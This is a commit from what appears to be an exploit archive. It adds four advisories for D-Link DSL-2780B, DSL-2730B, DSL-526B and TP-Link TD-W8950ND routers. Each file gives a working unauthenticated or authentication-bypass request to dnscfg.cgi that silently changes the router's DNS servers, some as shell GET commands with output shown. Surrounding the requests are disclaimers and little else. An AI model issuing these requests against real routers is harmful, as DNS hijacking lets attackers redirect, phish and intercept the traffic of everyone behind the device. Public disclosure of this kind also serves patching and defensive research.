DB: 2015-06-09

4 new exploits
2015-06-09 06:38:42 +00:00 · 2015-06-09 06:38:42 +00:00 · 82307c8cbc
commit 82307c8cbc
parent 6a755b7b3d
14 changed files with 1158 additions and 1022 deletions
--- a/files.csv
+++ b/files.csv
--- a/platforms/hardware/webapps/37237.txt
+++ b/platforms/hardware/webapps/37237.txt
@ -0,0 +1,31 @@
+  D-Link DSL-2780B DLink_1.01.14 
+  Unauthenticated Remote DNS Change
+
+  Copyright 2015 (c) Todor Donev 
+  <todor.donev at gmail.com>
+  http://www.ethical-hacker.org/
+  https://www.facebook.com/ethicalhackerorg
+
+  No description for morons, 
+  script kiddies & noobs !!
+
+  Disclaimer:
+  This or previous programs is for Educational
+  purpose ONLY. Do not use it without permission.
+  The usual disclaimer applies, especially the
+  fact that Todor Donev is not liable for any
+  damages caused by direct or indirect use of the
+  information or functionality provided by these
+  programs. The author or any Internet provider
+  bears NO responsibility for content or misuse
+  of these programs or any derivatives thereof.
+  By using these programs you accept the fact
+  that any damage (dataloss, system crash,
+  system compromise, etc.) caused by the use
+  of these programs is not Todor Donev's
+  responsibility.
+  
+  Use them at your own risk!
+
+
+[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1" 0&> /dev/null <&1
--- a/platforms/hardware/webapps/37238.txt
+++ b/platforms/hardware/webapps/37238.txt
@ -0,0 +1,31 @@
+  TP-Link ADSL2+ TD-W8950ND 
+  Unauthenticated Remote DNS Change
+
+  Copyright 2015 (c) Todor Donev 
+  <todor.donev at gmail.com>
+  http://www.ethical-hacker.org/
+  https://www.facebook.com/ethicalhackerorg
+
+  No description for morons, 
+  script kiddies & noobs !!
+
+  Disclaimer:
+  This or previous programs is for Educational
+  purpose ONLY. Do not use it without permission.
+  The usual disclaimer applies, especially the
+  fact that Todor Donev is not liable for any
+  damages caused by direct or indirect use of the
+  information or functionality provided by these
+  programs. The author or any Internet provider
+  bears NO responsibility for content or misuse
+  of these programs or any derivatives thereof.
+  By using these programs you accept the fact
+  that any damage (dataloss, system crash,
+  system compromise, etc.) caused by the use
+  of these programs is not Todor Donev's
+  responsibility.
+  
+  Use them at your own risk!
+
+
+[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
--- a/platforms/hardware/webapps/37240.txt
+++ b/platforms/hardware/webapps/37240.txt
@ -0,0 +1,39 @@
+  D-Link DSL-2730B AU_2.01 
+  Authentication Bypass DNS Change
+
+  Copyright 2015 (c) Todor Donev 
+  <todor.donev at gmail.com>
+  http://www.ethical-hacker.org/
+  https://www.facebook.com/ethicalhackerorg
+
+  Disclaimer:
+  This or previous programs is for Educational
+  purpose ONLY. Do not use it without permission.
+  The usual disclaimer applies, especially the
+  fact that Todor Donev is not liable for any
+  damages caused by direct or indirect use of the
+  information or functionality provided by these
+  programs. The author or any Internet provider
+  bears NO responsibility for content or misuse
+  of these programs or any derivatives thereof.
+  By using these programs you accept the fact
+  that any damage (dataloss, system crash,
+  system compromise, etc.) caused by the use
+  of these programs is not Todor Donev's
+  responsibility.
+  
+  Use them at your own risk!
+
+  This security hole allows an attacker to bypass 
+  authentication and change the DNS. When the
+  administrator is logged in the web  management 
+  interface, an attacker may be able to completely 
+  bypass authentication phase and connect to the 
+  web management interface with administrator's 
+  credentials. This attack can also be performed 
+  by an external attacker who connects to the 
+  router's public IP address, if remote management 
+  is enabled. To change the DNS without logging 
+  into web management interface use the following URL:
+  
+http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
--- a/platforms/hardware/webapps/37241.txt
+++ b/platforms/hardware/webapps/37241.txt
@ -0,0 +1,31 @@
+  D-Link DSL-526B ADSL2+ AU_2.01 
+  Unauthenticated Remote DNS Change
+
+  Copyright 2015 (c) Todor Donev 
+  <todor.donev at gmail.com>
+  http://www.ethical-hacker.org/
+  https://www.facebook.com/ethicalhackerorg
+
+  No description for morons, 
+  script kiddies & noobs !!
+
+  Disclaimer:
+  This or previous programs is for Educational
+  purpose ONLY. Do not use it without permission.
+  The usual disclaimer applies, especially the
+  fact that Todor Donev is not liable for any
+  damages caused by direct or indirect use of the
+  information or functionality provided by these
+  programs. The author or any Internet provider
+  bears NO responsibility for content or misuse
+  of these programs or any derivatives thereof.
+  By using these programs you accept the fact
+  that any damage (dataloss, system crash,
+  system compromise, etc.) caused by the use
+  of these programs is not Todor Donev's
+  responsibility.
+  
+  Use them at your own risk!
+
+[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" | grep "var dns2"  
+    var dns2 = '8.8.8.8';